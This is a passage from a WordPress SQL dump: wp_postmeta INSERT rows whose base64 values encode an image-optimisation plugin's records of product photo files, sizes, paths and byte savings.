RzXC8yMDE2XC8wOVwvTVMtNDc3Qy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3N0MtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc0NSwidGltZSI6MTQ4MzU2NDcwNCwiaWQiOjE3NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzdDLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNjA0LCJ0aW1lIjoxNDgzNTY0NzA3LCJpZCI6MTc1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3N0MtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIzNjcsInRpbWUiOjE0ODM1NjQ3MTEsImlkIjoxNzU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc3Qy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDcyOSwidGltZSI6MTQ4MzU2NDcxNiwiaWQiOjE3NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzdDLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MzIsInRpbWUiOjE0ODM1NjQ3MTksImlkIjoxNzU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc3Qy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ2LCJ0aW1lIjoxNDgzNTY0NzIzLCJpZCI6MTc1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3N0MtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwOSwidGltZSI6MTQ4MzU2NDcyNiwiaWQiOjE3NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzdDLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDQ3LCJ0aW1lIjoxNDgzNTY0NzMwLCJpZCI6MTc1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc3Qy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDA3LCJ0aW1lIjoxNDgzNTY0NzMzLCJpZCI6MTc1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc3Qy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTcyLCJ0aW1lIjoxNDgzNTY0NzM2LCJpZCI6MTc1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc3Qy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTYzLCJ0aW1lIjoxNDgzNTY0NzQwLCJpZCI6MTc1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc3Qy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODE3LCJ0aW1lIjoxNDgzNTY0NzQzLCJpZCI6MTc1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc3Qy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3MCwidGltZSI6MTQ4MzU2NDc0NiwiaWQiOjE3NTl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29238, 1758, 'wpfc_optimisation_reduction', '26249'); 
INSERT INTO `wp_postmeta` VALUES (29239, 1758, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDc1MSwiaWQiOiIxNzU4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3NUMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkxOSwidGltZSI6MTQ4MzU2NDc1NSwiaWQiOjE3NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzVDLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMDI5LCJ0aW1lIjoxNDgzNTY0NzU4LCJpZCI6MTc1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3NUMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI3MTIsInRpbWUiOjE0ODM1NjQ3NjEsImlkIjoxNzU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc1Qy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzEyMywidGltZSI6MTQ4MzU2NDc2NSwiaWQiOjE3NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzVDLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MjYsInRpbWUiOjE0ODM1NjQ3NjksImlkIjoxNzU4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc1Qy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTIyLCJ0aW1lIjoxNDgzNTY0NzcyLCJpZCI6MTc1OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3NUMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU4NCwidGltZSI6MTQ4MzU2NDc3NSwiaWQiOjE3NTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzVDLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODE5LCJ0aW1lIjoxNDgzNTY0Nzc5LCJpZCI6MTc1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc1Qy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDAzLCJ0aW1lIjoxNDgzNTY0NzgyLCJpZCI6MTc1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc1Qy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTQyLCJ0aW1lIjoxNDgzNTY0Nzg1LCJpZCI6MTc1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc1Qy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjI1LCJ0aW1lIjoxNDgzNTY0Nzg5LCJpZCI6MTc1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzVDLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc1Qy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTY5LCJ0aW1lIjoxNDgzNTY0NzkyLCJpZCI6MTc1OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3NUMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc1Qy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDc1Qy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3NiwidGltZSI6MTQ4MzU2NDc5NSwiaWQiOjE3NTh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29240, 1757, 'wpfc_optimisation_reduction', '21527'); 
INSERT INTO `wp_postmeta` VALUES (29241, 1757, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MlMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDgwMCwiaWQiOiIxNzU3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzJTLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MlMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjczMSwidGltZSI6MTQ4MzU2NDgwMywiaWQiOjE3NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcyUy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1